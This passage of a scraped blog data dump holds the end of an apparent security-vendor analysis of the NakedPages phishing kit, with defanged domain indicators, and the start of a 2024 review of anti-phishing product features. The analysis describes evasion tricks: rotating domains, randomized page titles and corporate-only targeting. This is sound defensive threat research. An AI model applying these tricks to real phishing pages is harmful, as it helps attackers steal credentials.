malicious phishing activity, there is a higher chance of detection and user reports. In this case the phishing kit actually retrieves a new URL to redirect to, along with a suitable JWT authentication parameter. The benefit of this is that when URLs/hostnames get flagged as malicious, blocked or otherwise taken down, the phishing kit can just redirect to other hostnames, and the attacker’s can keep updating with new URLs over time. ",{"data":53821,"content":53822,"nodeType":860},{},[53823],{"data":53824,"marks":53825,"value":53826,"nodeType":864},{},[],"Below we can see an example of the response containing a URL, with a JWT auth parameter:",{"data":53828,"content":53832,"nodeType":996},{"target":53829},{"sys":53830},{"id":53831,"type":1001,"linkType":1002},"4NpH7V5oEdTASNNJsqCJ47",[],{"data":53834,"content":53838,"nodeType":996},{"target":53835},{"sys":53836},{"id":53837,"type":1001,"linkType":1002},"7oqkrhNXtyOlJMEz0BZyLo",[],{"data":53840,"content":53841,"nodeType":860},{},[53842],{"data":53843,"marks":53844,"value":53845,"nodeType":864},{},[],"Automating this request in this example brings back around 20 different primary domains used for the final phishing attack. These domains are rotated over time as some are blocked and new ones are created.",{"data":53847,"content":53848,"nodeType":1009},{},[53849],{"data":53850,"marks":53851,"value":53852,"nodeType":864},{},[],"Step 8: Breaking login page signatures",{"data":53854,"content":53855,"nodeType":860},{},[53856],{"data":53857,"marks":53858,"value":53859,"nodeType":864},{},[],"If all the previous checks have passed then a victim user is finally presented with a phishing page. The attacker has most closely emulated the sign-on page for live.com for Outlook in this case, though it also has some aspects from a business Microsoft login too, as we can see in the examples below:",{"data":53861,"content":53865,"nodeType":996},{"target":53862},{"sys":53863},{"id":53864,"type":1001,"linkType":1002},"2Ez0fgAlmkrisdQGWfL6CV",[],{"data":53867,"content":53868,"nodeType":860},{},[53869],{"data":53870,"marks":53871,"value":53872,"nodeType":864},{},[],"However, one obvious change can be seen in the HTML title in the tab header. This normally says something like “Sign in to Outlook” or “Sign in to your account”. In this case, the phishing kit has randomized the HTML title. \n\nOne super easy way to detect websites pretending to be common login pages that have 1:1 cloned the website or are performing full reverse proxy AiTM techniques would be to search for obvious HTML content like this. Not many legitimate websites should have an HTML title of “Sign in to Outlook” other than Microsoft’s own legitimate domains for it, right?",{"data":53874,"content":53875,"nodeType":860},{},[53876],{"data":53877,"marks":53878,"value":53879,"nodeType":864},{},[],"Taking a closer look, we’ll see that the HTML, DOM and JavaScript etc. differ quite significantly from the true login pages, even if the visual appearance is very similar. One reason for this is to make it harder for defenders to simply signature on specific aspects of commonly spoofed login pages.",{"data":53881,"content":53882,"nodeType":1009},{},[53883],{"data":53884,"marks":53885,"value":53886,"nodeType":864},{},[],"Step 9: B2B targeting",{"data":53888,"content":53889,"nodeType":860},{},[53890],{"data":53891,"marks":53892,"value":53893,"nodeType":864},{},[],"The final interesting aspect of this particular example is that it modifies its behavior during the login process depending on whether a personal Microsoft account or an organization account is used.",{"data":53895,"content":53896,"nodeType":860},{},[53897,53901,53909],{"data":53898,"marks":53899,"value":53900,"nodeType":864},{},[],"When entering an email address associated with a personal Microsoft account, or picking ‘personal account’ when prompted after entering an email address that is used for both purposes, the server will return a 302 redirect and send the user to ",{"data":53902,"content":53904,"nodeType":883},{"uri":53903},"https://login.live.com/",[53905],{"data":53906,"marks":53907,"value":53903,"nodeType":864},{},[53908],{"type":1455},{"data":53910,"marks":53911,"value":53912,"nodeType":864},{},[]," where they can then re-enter their credentials and login to Microsoft legitimately if they continue. This reduces the potential for detection further as no AitM phishing login will actually occur.",{"data":53914,"content":53915,"nodeType":860},{},[53916,53920,53925],{"data":53917,"marks":53918,"value":53919,"nodeType":864},{},[],"On the other hand, when using an organization account the phishing process continues as expected. ",{"data":53921,"marks":53922,"value":53924,"nodeType":864},{},[53923],{"type":899},"This phishing campaign is exclusively targeting corp accounts",{"data":53926,"marks":53927,"value":53928,"nodeType":864},{},[]," and you could almost say it has a B2B (or is that A2B?) rather than B2C business model.  ",{"data":53930,"content":53931,"nodeType":1009},{},[53932],{"data":53933,"marks":53934,"value":24968,"nodeType":864},{},[],{"data":53936,"content":53937,"nodeType":860},{},[53938],{"data":53939,"marks":53940,"value":53941,"nodeType":864},{},[],"As you may have guessed from the extremely suspicious domains in use and examples of sloppy coding (like forgetting to implement an encryption function) the NakedPages kit is far from sophisticated. Despite this, the tricks that attackers are using to make detection and analysis more difficult seem to be quite effective when used in a layered model. ",{"data":53943,"content":53944,"nodeType":860},{},[53945],{"data":53946,"marks":53947,"value":53948,"nodeType":864},{},[],"For example, at the time of writing this particular Worker had been up for at least two days and was currently only triggering 1 detection on VirusTotal. ",{"data":53950,"content":53954,"nodeType":996},{"target":53951},{"sys":53952},{"id":53953,"type":1001,"linkType":1002},"1mIOpDtmgcMasK6dEhRHsm",[],{"data":53956,"content":53957,"nodeType":860},{},[53958],{"data":53959,"marks":53960,"value":53961,"nodeType":864},{},[],"One key takeaway is that it’s near impossible to stay on top of all the phishing servers on the internet. Even the untargeted mass campaigns will initially be missed by TI feeds, let alone the targeted ones. ",{"data":53963,"content":53964,"nodeType":860},{},[53965,53969,53977],{"data":53966,"marks":53967,"value":53968,"nodeType":864},{},[],"The best foot forward for resilience against these attacks is through the use of domain-bound MFA methods like WebAuthn. Common MFA methods like OTPs, SMS, push notifications etc. are routinely bypassed using ",{"data":53970,"content":53971,"nodeType":883},{"uri":35355},[53972],{"data":53973,"marks":53974,"value":53976,"nodeType":864},{},[53975],{"type":1455},"AitM techniques that proxy the MFA authentication as well",{"data":53978,"marks":53979,"value":53980,"nodeType":864},{},[],". Even if you are one of the few who use phishing-resistant MFA methods like WebAuthn or other passkeys, the devil is in the detail and we’ve seen MFA downgrade attacks being used to bypass them by choosing a phishable method that’s also active.",{"data":53982,"content":53986,"nodeType":996},{"target":53983},{"sys":53984},{"id":53985,"type":1001,"linkType":1002},"17lSgRFD6fDzRUn9eOHJg6",[],{"data":53988,"content":53989,"nodeType":1009},{},[53990],{"data":53991,"marks":53992,"value":53993,"nodeType":864},{},[],"P.S. How did we detect this?",{"data":53995,"content":53996,"nodeType":860},{},[53997,54001,54006,54010,54018],{"data":53998,"marks":53999,"value":54000,"nodeType":864},{},[],"After all that, you might be wondering how we managed to automate a process to generically pass through all these detection evasion techniques – ",{"data":54002,"marks":54003,"value":54005,"nodeType":864},{},[54004],{"type":899},"well the short answer is: We didn’t.",{"data":54007,"marks":54008,"value":54009,"nodeType":864},{},[]," Instead, we detected the act of an employee ",{"data":54011,"content":54012,"nodeType":883},{"uri":24354},[54013],{"data":54014,"marks":54015,"value":54017,"nodeType":864},{},[54016],{"type":1455},"attempting to put their Microsoft password into a website that wasn’t Microsoft",{"data":54019,"marks":54020,"value":2924,"nodeType":864},{},[],{"data":54022,"content":54023,"nodeType":860},{},[54024],{"data":54025,"marks":54026,"value":54027,"nodeType":864},{},[],"The TTP for phishing is effectively “trick someone into putting their valid credentials into the wrong site” – so detecting that behavior directly (the action of entering a legit password into the wrong site) can be a lot simpler and more effective than playing the cat-and-mouse detection → detection-evasion game.",{"data":54029,"content":54030,"nodeType":860},{},[54031],{"data":54032,"marks":54033,"value":54034,"nodeType":864},{},[],"Having said that, if you’re interested, here are the domain IOCs for this campaign:",{"data":54036,"content":54037,"nodeType":860},{},[54038],{"data":54039,"marks":54040,"value":54042,"nodeType":864},{},[54041],{"type":10610},"226028cc[.]502f135e3e036e726fba22d4[.]workers[.]dev\nacevoorgukmembership[.]buzz\nalerteditorroyalsocietyorgnz[.]buzz\nandymarshallsgeniuslocidigestghostiomghostio[.]buzz\nblogresponseinsperitycom[.]buzz\ncampaigneventbritecomnoreply[.]buzz\ncharityexcellencer1technologytrustnewsorg[.]buzz\nclerkenwelldesignweekcomnoreply[.]buzz\nconfirminfothetrainlinecomauto[.]buzz\nhealthestatejournalcomnoreply[.]buzz\nmentalhealthdesignandbuildcomnoreply[.]buzz\nnoreplynotificationswhoopcom[.]buzz\nstepexhibitionscomeventsupport[.]buzz\ntheathletice1theathleticcom[.]buzz\nthekakahoonssubstackcom[.]buzz","How AitM phishing kits evade detection","Taking a closer look at the steps that AitM phishing kits take to hide from the prying eyes of security teams and threat intelligence vendors.","2024-07-23T00:00:00.000Z","how-aitm-phishing-kits-evade-detection",{"items":54048},[54049,54051],{"sys":54050,"name":342},{"id":6596},{"sys":54052,"name":6593},{"id":6592},{"items":54054},[54055],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":54056},{"url":4955},{"__typename":2059,"sys":54058,"content":54060,"title":55229,"synopsis":55230,"hashTags":59,"publishedDate":55231,"slug":55232,"tagsCollection":55233,"authorsCollection":55239},{"id":54059},"5KqYY7p174lSpuinfTfEZU",{"json":54061},{"data":54062,"content":54063,"nodeType":856},{},[54064,54071,54126,54133,54136,54143,54150,54183,54195,54198,54205,54216,54223,54242,54248,54267,54274,54285,54305,54325,54332,54351,54357,54377,54380,54387,54394,54401,54420,54438,54445,54464,54471,54478,54503,54510,54530,54551,54557,54564,54583,54586,54593,54610,54629,54636,54689,54696,54699,54706,54713,54732,54752,54759,54766,54773,54793,54800,54807,54813,54819,54822,54829,54836,54843,54863,54873,54892,54899,54906,54916,54923,54930,54950,54956,54959,54966,54973,54980,55052,55059,55066,55073,55081,55102,55109,55115,55126,55147,55154,55162,55181,55188,55195,55201,55204,55211],{"data":54065,"content":54066,"nodeType":860},{},[54067],{"data":54068,"marks":54069,"value":54070,"nodeType":864},{},[],"From massive breaches like the Snowflake incident to novel phishing techniques documented by Push researchers, 2024 was the year that identity attacks left their mark. Looking back over what we saw in the wild and what we found through Push’s own research, three key themes stand out:",{"data":54072,"content":54073,"nodeType":941},{},[54074,54093,54103],{"data":54075,"content":54076,"nodeType":945},{},[54077],{"data":54078,"content":54079,"nodeType":860},{},[54080,54084,54089],{"data":54081,"marks":54082,"value":54083,"nodeType":864},{},[],"Account takeover techniques on cloud apps are fundamentally different from traditional network-based attacks. To have the best chance of preventing account takeover, defenders need to  disrupt attacks ",{"data":54085,"marks":54086,"value":54088,"nodeType":864},{},[54087],{"type":2246},"before",{"data":54090,"marks":54091,"value":54092,"nodeType":864},{},[]," they’re successful.",{"data":54094,"content":54095,"nodeType":945},{},[54096],{"data":54097,"content":54098,"nodeType":860},{},[54099],{"data":54100,"marks":54101,"value":54102,"nodeType":864},{},[],"It’s not easy or practical to maintain 100 percent compliance on identity posture standards in a world where employees are using and signing up to apps outside of IT oversight — but it is possible to make this work a lot easier by using tools that help you scale your remediation activities.",{"data":54104,"content":54105,"nodeType":945},{},[54106],{"data":54107,"content":54108,"nodeType":860},{},[54109,54113,54122],{"data":54110,"marks":54111,"value":54112,"nodeType":864},{},[],"Despite another year where cybersecurity spend increased (now up to almost $1,100 per user, according to ",{"data":54114,"content":54116,"nodeType":883},{"uri":54115},"https://www.forrester.com/report/2024-cybersecurity-benchmarks-global/RES181118",[54117],{"data":54118,"marks":54119,"value":54121,"nodeType":864},{},[54120],{"type":1455},"Forrester",{"data":54123,"marks":54124,"value":54125,"nodeType":864},{},[],"), existing approaches are not successfully preventing account takeovers. Security teams need to be able to detect and respond to these attacks where they happen: The browser.",{"data":54127,"content":54128,"nodeType":860},{},[54129],{"data":54130,"marks":54131,"value":54132,"nodeType":864},{},[],"In this article, we’ll take a look back at how these themes influenced key features we delivered for Push customers in 2024.",{"data":54134,"content":54135,"nodeType":1005},{},[],{"data":54137,"content":54138,"nodeType":1009},{},[54139],{"data":54140,"marks":54141,"value":54142,"nodeType":864},{},[],"Defending against modern phishing attacks",{"data":54144,"content":54145,"nodeType":860},{},[54146],{"data":54147,"marks":54148,"value":54149,"nodeType":864},{},[],"Phishing techniques that bypass MFA are now the norm, and few organizations have successfully achieved full coverage of phishing-resistant MFA methods. ",{"data":54151,"content":54152,"nodeType":860},{},[54153,54157,54166,54170,54179],{"data":54154,"marks":54155,"value":54156,"nodeType":864},{},[],"Equally, while phishing attacks via email remain the most commonly reported vector, phishing attacks increasingly target users outside of email. For example, phishing links are often encountered through normal internet use — such as ",{"data":54158,"content":54160,"nodeType":883},{"uri":54159},"https://www.bleepingcomputer.com/news/security/hackers-use-google-search-ads-to-steal-google-ads-accounts/",[54161],{"data":54162,"marks":54163,"value":54165,"nodeType":864},{},[54164],{"type":1455},"in malicious Google ads",{"data":54167,"marks":54168,"value":54169,"nodeType":864},{},[]," — and attackers frequently conduct their campaigns over IM platforms like Slack and Teams. Late last year there was ",{"data":54171,"content":54173,"nodeType":883},{"uri":54172},"https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ?utm_source=share&utm_medium=member_desktop",[54174],{"data":54175,"marks":54176,"value":54178,"nodeType":864},{},[54177],{"type":1455},"a rise in attackers inundating users with spam via Teams",{"data":54180,"marks":54181,"value":54182,"nodeType":864},{},[],", combined with phone scams posing as IT admins. Since anti-phishing controls are usually email-based, they fail to protect users from attacks taking place elsewhere. ",{"data":54184,"content":54185,"nodeType":860},{},[54186,54190],{"data":54187,"marks":54188,"value":54189,"nodeType":864},{},[],"At Push, we’ve built a suite of anti-phishing features over the last year that act as a defense-in-depth approach to the types of modern phishing techniques we’ve been observing in the wild. ",{"data":54191,"marks":54192,"value":54194,"nodeType":864},{},[54193],{"type":899},"Here’s what we built and why.",{"data":54196,"content":54197,"nodeType":1005},{},[],{"data":54199,"content":54200,"nodeType":1009},{},[54201],{"data":54202,"marks":54203,"value":54204,"nodeType":864},{},[],"Protecting passwords used for SSO",{"data":54206,"content":54207,"nodeType":1312},{},[54208,54213],{"data":54209,"marks":54210,"value":54212,"nodeType":864},{},[54211],{"type":899},"What happened?",{"data":54214,"marks":54215,"value":1171,"nodeType":864},{},[],{"data":54217,"content":54218,"nodeType":860},{},[54219],{"data":54220,"marks":54221,"value":54222,"nodeType":864},{},[],"Attackers explicitly targeted Okta, Entra, and Google Workspace accounts in 2023 and 2024, so we knew a top priority would be protecting identity provider accounts. These IdP accounts are a key target because they allow attackers to move laterally to other valuable apps and data via SSO following the initial account takeover.",{"data":54224,"content":54225,"nodeType":860},{},[54226,54230,54238],{"data":54227,"marks":54228,"value":54229,"nodeType":864},{},[],"It’s not just the typical IdPs you need to watch out for, either: Apps like GitHub, Slack, Salesforce, Facebook, X, and others all provide SSO functionality, increasing the blast radius of a compromise. And as we reported in ",{"data":54231,"content":54232,"nodeType":883},{"uri":25156},[54233],{"data":54234,"marks":54235,"value":54237,"nodeType":864},{},[54236],{"type":1455},"our research on cross-IdP impersonation",{"data":54239,"marks":54240,"value":54241,"nodeType":864},{},[],", apps can be accessed using multiple SSO methods simultaneously — and 3 in 5 apps that we tested recently did not require re-verification by default when adding a new login method.",{"data":54243,"content":54247,"nodeType":996},{"target":54244},{"sys":54245},{"id":54246,"type":1001,"linkType":1002},"3EOOr4dVQoiPjl2ucUs1mA",[],{"data":54249,"content":54250,"nodeType":860},{},[54251,54255,54263],{"data":54252,"marks":54253,"value":54254,"nodeType":864},{},[],"Phishing is a problem that would be significantly reduced in a world without passwords. But while the ideal case is that organizations can put in place phishing-resistant authentication methods like passkeys or other WebAuthn-based methods, the reality is that ",{"data":54256,"content":54257,"nodeType":883},{"uri":49142},[54258],{"data":54259,"marks":54260,"value":54262,"nodeType":864},{},[54261],{"type":1455},"it’s not a perfect solution right now",{"data":54264,"marks":54265,"value":54266,"nodeType":864},{},[]," — widespread passkey implementation is hard to achieve.",{"data":54268,"content":54269,"nodeType":860},{},[54270],{"data":54271,"marks":54272,"value":54273,"nodeType":864},{},[],"One of the key advantages of passkeys is that they are domain-bound: Meaning they can’t be used on a site with the wrong domain. So, we started thinking: What if it were possible to essentially domain-bind a password? ",{"data":54275,"content":54276,"nodeType":1312},{},[54277,54282],{"data":54278,"marks":54279,"value":54281,"nodeType":864},{},[54280],{"type":899},"What we built",{"data":54283,"marks":54284,"value":1171,"nodeType":864},{},[],{"data":54286,"content":54287,"nodeType":860},{},[54288,54292,54301],{"data":54289,"marks":54290,"value":54291,"nodeType":864},{},[],"In the first half of 2024, we delivered our ",{"data":54293,"content":54294,"nodeType":883},{"uri":24354},[54295],{"data":54296,"marks":54297,"value":54300,"nodeType":864},{},[54298,54299],{"type":1455},{"type":899},"SSO password protection",{"data":54302,"marks":54303,"value":54304,"nodeType":864},{},[]," feature, which allows Push administrators to block employees from entering their IdP password into any site that’s not the identity provider — in effect domain-binding SSO credentials. ",{"data":54306,"content":54307,"nodeType":860},{},[54308,54312,54321],{"data":54309,"marks":54310,"value":54311,"nodeType":864},{},[],"Push accomplishes this via the Push browser agent, which ",{"data":54313,"content":54315,"nodeType":883},{"uri":54314},"https://pushsecurity.com/help/10109/#how-does-sso-password-protection-work",[54316],{"data":54317,"marks":54318,"value":54320,"nodeType":864},{},[54319],{"type":1455},"observes and fingerprints",{"data":54322,"marks":54323,"value":54324,"nodeType":864},{},[]," the user’s SSO password and legitimate SSO login pages, and then enforces in-browser controls to prevent an SSO password from being submitted on any URL that doesn’t match the legitimate provider, an extremely strong anti-phishing protection. Separately, Push also verifies that passwords it observes are not easily guessable.",{"data":54326,"content":54327,"nodeType":860},{},[54328],{"data":54329,"marks":54330,"value":54331,"nodeType":864},{},[],"The idea behind this approach is to gain some similar benefits to passkeys — by ensuring that passwords used for SSO access to your apps cannot be phished and are unique and strong — but in a way that “just works” with existing password-based authentication. ",{"data":54333,"content":54334,"nodeType":860},{},[54335,54339,54347],{"data":54336,"marks":54337,"value":54338,"nodeType":864},{},[],"Organizations that monitor for SSO password reuse will find that the practice turns out to be incredibly widespread, so being able to detect and prevent password reuse — even outside of actual phishing attempts — is an asset to security teams. (Our ",{"data":54340,"content":54341,"nodeType":883},{"uri":49042},[54342],{"data":54343,"marks":54344,"value":54346,"nodeType":864},{},[54345],{"type":1455},"research shows",{"data":54348,"marks":54349,"value":54350,"nodeType":864},{},[]," that 10% of IdP accounts are using a password that is shared with another app — where it is much more likely to be compromised.) ",{"data":54352,"content":54356,"nodeType":996},{"target":54353},{"sys":54354},{"id":54355,"type":1001,"linkType":1002},"4Ce999wf4mqCZwu1jLofsx",[],{"data":54358,"content":54359,"nodeType":860},{},[54360,54364,54373],{"data":54361,"marks":54362,"value":54363,"nodeType":864},{},[],"By streaming events to your SIEM and setting up a simple automation, you can also use Push-supplied intelligence on SSO password reuse to ",{"data":54365,"content":54367,"nodeType":883},{"uri":54366},"https://pushsecurity.com/blog/automating-sso-password-resets-using-push/",[54368],{"data":54369,"marks":54370,"value":54372,"nodeType":864},{},[54371],{"type":1455},"automatically reset",{"data":54374,"marks":54375,"value":54376,"nodeType":864},{},[]," potentially compromised passwords — this provides instant response to successful phishing and gets rid of password re-use of your most sensitive credentials in one move - the kind of combo we love!",{"data":54378,"content":54379,"nodeType":1005},{},[],{"data":54381,"content":54382,"nodeType":1009},{},[54383],{"data":54384,"marks":54385,"value":54386,"nodeType":864},{},[],"Blocking AitM phishing and cloned login pages",{"data":54388,"content":54389,"nodeType":1312},{},[54390],{"data":54391,"marks":54392,"value":54212,"nodeType":864},{},[54393],{"type":899},{"data":54395,"content":54396,"nodeType":860},{},[54397],{"data":54398,"marks":54399,"value":54400,"nodeType":864},{},[],"When you’re able to detect SSO passwords being used in all the wrong places, it’s not surprising that one of the main offenders is phishing attacks. ",{"data":54402,"content":54403,"nodeType":860},{},[54404,54408,54416],{"data":54405,"marks":54406,"value":54407,"nodeType":864},{},[],"In 2024, we wrote extensively about the rise in ",{"data":54409,"content":54410,"nodeType":883},{"uri":35355},[54411],{"data":54412,"marks":54413,"value":54415,"nodeType":864},{},[54414],{"type":1455},"modern phishing attacks",{"data":54417,"marks":54418,"value":54419,"nodeType":864},{},[]," that use adversary-in-the middle toolkits (AiTM), including EvilNoVNC, Evilginx, and others.",{"data":54421,"content":54422,"nodeType":860},{},[54423,54427,54435],{"data":54424,"marks":54425,"value":54426,"nodeType":864},{},[],"AiTM phishing is a newer variant of phishing that allows attackers to bypass MFA protection by using tools that act as a proxy between the end-user and a legitimate login portal. AitM attacks increased 146% in 2023 (",{"data":54428,"content":54430,"nodeType":883},{"uri":54429},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/final/en-us/microsoft-brand/documents/Microsoft%20Digital%20Defense%20Report%202024%20%281%29.pdf",[54431],{"data":54432,"marks":54433,"value":13585,"nodeType":864},{},[54434],{"type":1455},{"data":54436,"marks":54437,"value":32836,"nodeType":864},{},[],{"data":54439,"content":54440,"nodeType":860},{},[54441],{"data":54442,"marks":54443,"value":54444,"nodeType":864},{},[],"This trend in tradecraft was reflected in our own customer base last year, but what’s interesting is that we observed a lot of phish kits and tactics that were new — meaning traditional detections failed to find them before Push did. ",{"data":54446,"content":54447,"nodeType":860},{},[54448,54452,54460],{"data":54449,"marks":54450,"value":54451,"nodeType":864},{},[],"In particular, we saw newer ",{"data":54453,"content":54454,"nodeType":883},{"uri":48183},[54455],{"data":54456,"marks":54457,"value":54459,"nodeType":864},{},[54458],{"type":1455},"web-based obfuscation techniques",{"data":54461,"marks":54462,"value":54463,"nodeType":864},{},[]," that allowed attackers to get past the features of email security tools like web gateways and email scanning appliances, such as bypassing web sandbox analysis, and deter other forms of automated investigation by using Cloudflare Turnstile and other tactics — similar to the approaches legit websites use to protect against automated bots (this is essentially the same problem for both).",{"data":54465,"content":54466,"nodeType":860},{},[54467],{"data":54468,"marks":54469,"value":54470,"nodeType":864},{},[],"The gap in existing controls was obvious: When all phishing routes eventually lead to the browser, security teams need to be able to detect and respond in the browser. To do this well they need to observe what the employee sees, not what loads in a sandbox.",{"data":54472,"content":54473,"nodeType":1312},{},[54474],{"data":54475,"marks":54476,"value":54281,"nodeType":864},{},[54477],{"type":899},{"data":54479,"content":54480,"nodeType":860},{},[54481,54485,54495,54500],{"data":54482,"marks":54483,"value":54484,"nodeType":864},{},[],"To address this gap, we released new capabilities for the Push browser agent to be able to ",{"data":54486,"content":54488,"nodeType":883},{"uri":54487},"https://pushsecurity.com/blog/introducing-aitm-phishing-toolkit-detection-powered-by-the-push-browser/",[54489],{"data":54490,"marks":54491,"value":54494,"nodeType":864},{},[54492,54493],{"type":1455},{"type":899},"detect and block",{"data":54496,"marks":54497,"value":54499,"nodeType":864},{},[54498],{"type":899}," when a site is running AiTM phishing toolkits",{"data":54501,"marks":54502,"value":10094,"nodeType":864},{},[],{"data":54504,"content":54505,"nodeType":860},{},[54506],{"data":54507,"marks":54508,"value":54509,"nodeType":864},{},[],"Push does this via a set of readymade detections for common AiTM tools. By dynamically analyzing the behavior of malware in the browser, the Push browser agent can find indicators of compromise beyond just domains, file names, IP addresses, etc., focusing instead on behavioral attributes, such as Javascript calls being made or data structures saved to local storage.",{"data":54511,"content":54512,"nodeType":860},{},[54513,54517,54526],{"data":54514,"marks":54515,"value":54516,"nodeType":864},{},[],"This approach of focusing on the top of the ",{"data":54518,"content":54520,"nodeType":883},{"uri":54519},"https://pushsecurity.com/blog/our-design-philosophy-detecting-what-matters/#id-building-effective-identity-threat-detection-controls_id-scenario-detecting-a-web-based-phishing-attack",[54521],{"data":54522,"marks":54523,"value":54525,"nodeType":864},{},[54524],{"type":1455},"Pyramid of Pain",{"data":54527,"marks":54528,"value":54529,"nodeType":864},{},[]," — e.g. building detections for attributes of an attack that are the hardest for attackers to change, and therefore the most reliably accurate — is core to Push’s design philosophy. ",{"data":54531,"content":54532,"nodeType":860},{},[54533,54537,54547],{"data":54534,"marks":54535,"value":54536,"nodeType":864},{},[],"Finally, toward the second half of the year, we released ",{"data":54538,"content":54540,"nodeType":883},{"uri":54539},"https://pushsecurity.com/blog/introducing-cloned-login-page-detection/",[54541],{"data":54542,"marks":54543,"value":54546,"nodeType":864},{},[54544,54545],{"type":1455},{"type":899},"cloned login page detection",{"data":54548,"marks":54549,"value":54550,"nodeType":864},{},[],", a natural extension of our layered approach to preventing phishing attacks in the browser. With this security control, you can identify malicious webpages that are masquerading as legitimate IdP login portals. ",{"data":54552,"content":54556,"nodeType":996},{"target":54553},{"sys":54554},{"id":54555,"type":1001,"linkType":1002},"4y25OxesssUk9lzEx12HFa",[],{"data":54558,"content":54559,"nodeType":860},{},[54560],{"data":54561,"marks":54562,"value":54563,"nodeType":864},{},[],"When a cloned login page is detected, you can add the URL to your blocklist in Push and prevent any other employees from being targeted. ",{"data":54565,"content":54566,"nodeType":860},{},[54567,54571,54579],{"data":54568,"marks":54569,"value":54570,"nodeType":864},{},[],"By layering multiple anti-phishing controls that all prevent account takeover, defenders have the best chance at thwarting the ",{"data":54572,"content":54573,"nodeType":883},{"uri":45206},[54574],{"data":54575,"marks":54576,"value":54578,"nodeType":864},{},[54577],{"type":1455},"short, fast attack chains",{"data":54580,"marks":54581,"value":54582,"nodeType":864},{},[]," that are emblematic of today’s identity attacks.",{"data":54584,"content":54585,"nodeType":1005},{},[],{"data":54587,"content":54588,"nodeType":1009},{},[54589],{"data":54590,"marks":54591,"value":54592,"nodeType":864},{},[],"Defending against stolen sessions and stolen credentials",{"data":54594,"content":54595,"nodeType":860},{},[54596,54600,54607],{"data":54597,"marks":54598,"value":54599,"nodeType":864},{},[],"With as little as $10 to buy a stolen password and a little skill, attackers capitalized on the use of stolen credentials last year. Stolen creds were the No. 1 attacker action in 2023 and 2024, according to ",{"data":54601,"content":54602,"nodeType":883},{"uri":4408},[54603],{"data":54604,"marks":54605,"value":19595,"nodeType":864},{},[54606],{"type":1455},{"data":54608,"marks":54609,"value":2924,"nodeType":864},{},[],{"data":54611,"content":54612,"nodeType":860},{},[54613,54617,54625],{"data":54614,"marks":54615,"value":54616,"nodeType":864},{},[],"Nowhere was this more plain than in the ",{"data":54618,"content":54619,"nodeType":883},{"uri":3751},[54620],{"data":54621,"marks":54622,"value":54624,"nodeType":864},{},[54623],{"type":1455},"attacks on Snowflake customers",{"data":54626,"marks":54627,"value":54628,"nodeType":864},{},[],", one of the biggest breaches of last year. In this incident, cyber criminals targeted around 165 customers of the cloud-based data warehouse tool Snowflake by taking over accounts using credentials harvested from infostealer infections dating as far back as 2020.",{"data":54630,"content":54631,"nodeType":860},{},[54632],{"data":54633,"marks":54634,"value":54635,"nodeType":864},{},[],"The Snowflake incident underscored the challenges of control and visibility that security teams face when attempting to secure identities on a patchwork of managed and unmanaged apps:",{"data":54637,"content":54638,"nodeType":941},{},[54639,54649,54659,54669,54679],{"data":54640,"content":54641,"nodeType":945},{},[54642],{"data":54643,"content":54644,"nodeType":860},{},[54645],{"data":54646,"marks":54647,"value":54648,"nodeType":864},{},[],"Do I know all the workforce accounts my employees use?",{"data":54650,"content":54651,"nodeType":945},{},[54652],{"data":54653,"content":54654,"nodeType":860},{},[54655],{"data":54656,"marks":54657,"value":54658,"nodeType":864},{},[],"Do those accounts have a strong security posture?",{"data":54660,"content":54661,"nodeType":945},{},[54662],{"data":54663,"content":54664,"nodeType":860},{},[54665],{"data":54666,"marks":54667,"value":54668,"nodeType":864},{},[],"Do those accounts use MFA? The most phishing-resistant methods?",{"data":54670,"content":54671,"nodeType":945},{},[54672],{"data":54673,"content":54674,"nodeType":860},{},[54675],{"data":54676,"marks":54677,"value":54678,"nodeType":864},{},[],"Do I have tools to detect, respond, and remediate after an account takeover or breach of a critical software vendor?",{"data":54680,"content":54681,"nodeType":945},{},[54682],{"data":54683,"content":54684,"nodeType":860},{},[54685],{"data":54686,"marks":54687,"value":54688,"nodeType":864},{},[],"Do I know when a session has been stolen, pointing to a device compromised by infostealer malware?",{"data":54690,"content":54691,"nodeType":860},{},[54692],{"data":54693,"marks":54694,"value":54695,"nodeType":864},{},[],"Here’s what we delivered last year to make it easier for security teams to protect their organizations from the threat of stolen sessions and stolen creds.",{"data":54697,"content":54698,"nodeType":1005},{},[],{"data":54700,"content":54701,"nodeType":1009},{},[54702],{"data":54703,"marks":54704,"value":54705,"nodeType":864},{},[],"Detecting stolen sessions",{"data":54707,"content":54708,"nodeType":1312},{},[54709],{"data":54710,"marks":54711,"value":54212,"nodeType":864},{},[54712],{"type":899},{"data":54714,"content":54715,"nodeType":860},{},[54716,54719,54728],{"data":54717,"marks":54718,"value":21,"nodeType":864},{},[],{"data":54720,"content":54722,"nodeType":883},{"uri":54721},"https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/",[54723],{"data":54724,"marks":54725,"value":54727,"nodeType":864},{},[54726],{"type":1455},"Infostealer malware",{"data":54729,"marks":54730,"value":54731,"nodeType":864},{},[]," — a type of malware designed to collect user credentials, including session cookies, from end-user devices — had a very successful 2024, accounting for nearly 10 percent of activity that Red Canary was able to associate with named threats, and the majority of all detected malware that Sophos threat researchers documented last year.",{"data":54733,"content":54734,"nodeType":860},{},[54735,54739,54748],{"data":54736,"marks":54737,"value":54738,"nodeType":864},{},[],"While the use of stolen credentials is rampant, often facilitated by successful infostealer campaigns, a related attack type also ",{"data":54740,"content":54742,"nodeType":883},{"uri":54741},"https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/#id-the-state-of-infostealers-today",[54743],{"data":54744,"marks":54745,"value":54747,"nodeType":864},{},[54746],{"type":1455},"jumped in prevalence",{"data":54749,"marks":54750,"value":54751,"nodeType":864},{},[]," last year: session token theft attacks.",{"data":54753,"content":54754,"nodeType":860},{},[54755],{"data":54756,"marks":54757,"value":54758,"nodeType":864},{},[],"Using stolen tokens, adversaries don’t need to bypass MFA directly. They can simply import the tokens into their browser and assume an already authorized session. ",{"data":54760,"content":54761,"nodeType":1312},{},[54762],{"data":54763,"marks":54764,"value":54281,"nodeType":864},{},[54765],{"type":899},{"data":54767,"content":54768,"nodeType":860},{},[54769],{"data":54770,"marks":54771,"value":54772,"nodeType":864},{},[],"In order to detect a stolen session in use, you need telemetry that allows you to tie activity to a trusted endpoint. This didn’t previously exist, and you have to be in the browser to do it. So that’s what we built. 